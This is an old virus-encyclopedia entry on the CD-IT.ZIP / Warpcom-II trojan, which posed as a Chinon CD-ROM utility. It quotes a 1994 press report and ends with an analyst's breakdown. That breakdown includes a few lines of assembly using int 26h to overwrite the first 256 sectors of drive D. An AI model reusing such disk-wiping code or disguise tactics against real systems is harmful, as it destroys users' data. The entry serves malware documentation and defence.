%%File: VIRS0816.TXT %%Name/Aliases: Warpcom-II, CD-IT.ZIP, Chinon %%Platform: PC/MS-DOS %%Type: Trojan., install.com in CD-IT.ZIP archive %%Disk Location: Trojan program. %%Features: Direct acting. %%Damage: Overwrites first 256 logical sectors of drive D with garbage., Corrupts command.com %%Size: Overlays application, no increase %%See Also: %%Notes: Reported by Chinon in a press release. > >TORRANCE, CALIFORNIA, U.S.A., 1994 APR 29 (NB) -- A new "Trojan > >Horse" computer virus is on the Internet and is labeled with the > >name of the fourth largest manufacturer of compact disc read-only > >memory (CD-ROM) drives. Chinon America, Incorporated, the company > >whose name has been improperly used on the rogue program, is > >warning IBM and compatible personal computer (PC) users to beware > >of the program known as "CD-IT.ZIP." > > > >A Chinon CD-ROM drive user brought the program to the company's > >attention after downloading it from a Baltimore, Maryland > >Fidonet server. One of the clues that the virus, masquerading as > >a utility program, wasn't on the up-and-up was that it purports "to > >enable read/write to your CD-ROM drive," a physically impossible > >task. > > > >CD-IT is listed as authored by Joseph S. Shiner, couriered > >by HDA, and copyrighted by Chinon Products. Chinon America told > >Newsbytes it has no division by that name. Other clues were > >obscenities in the documentation as well as a line indicating > >that HDA stands for Haven't Decided a Name Yet. > > > >David Cole, director of research and development for Chinon, told > >Newsbytes that the company knows of no one who has actually been > >infected by the program. Cole said the virus isn't particularly > >clever or dynamic, but none of the virus software the company > >tried was able to eradicate the rogue program. Chinon officials > >declined to comment on what antivirus software programs were > >used. > > > >If CD-IT is actually run, it causes the computer to lock up, > >forcing a reboot, and then stays in memory, corrupting critical > >system files on the hard disk. Nothing but a high-level reformat > >of the hard disk drive will eradicate the virus at this point, a > >move that sacrifices all data on the drive. It will also corrupt > >any network volumes available. > > > >"We felt that it was our responsibility as a member of the > >computing community to alert Internet users of this dangerous > >virus that is being distributed with our name on it. Even though > >we have nothing to do with the virus is it particularly > >disturbing for us to think that many of our loyal customers could > >be duped into believing that the software is ours," Cole > >explained. > > > >Chinon is encouraging anyone who might have information that > >could lead to the arrest and prosecution of the parties > >responsible for CD-IT to call the company at 310-533-0274.. In > >addition, the company has notified the major distributors of > >virus protection software, such as Symantec and McAfee Associates, > >so they may update their programs to detect and eradicate CD-IT. > > > >(Linda Rohrbough/19940429/Press Contact: Rolland Going, The > >Terpin Group for Chinon, tel 310-798-7875, fax 310-798-7825; > >Public Contact: Chinon, CD-IT Information, 310-533-0274) > > The virus is actually the Warpcom-2 Trojan in a new archive. The Trojan overwrites toe copy of command.com with a short program that overwrites the D drive followed by a lot of hex FFs to fill out the file. The program that overwrites the D drive writes garbage to the first 256 sectors, though it does not seem to always work. mov aL,03 AL contains the disk number, 3=D mov cx,00ffh CX contains the number of sectors to write mov dx,0000h DX contains the first sector to write. int 26h Interrupt 26h, Absolute disk write sbb bh,bh trash. the interrupt also requires DS:BX to have value, as a pointer to the buffer to write to disk. Since these are not set in the program, you get whatever they happened to contain. I tried running this on a DOS 5 machine, and it did not seem to work. Int 26 is marked as superceeded in the dos programmers reference, so it is possible that it has been deleted.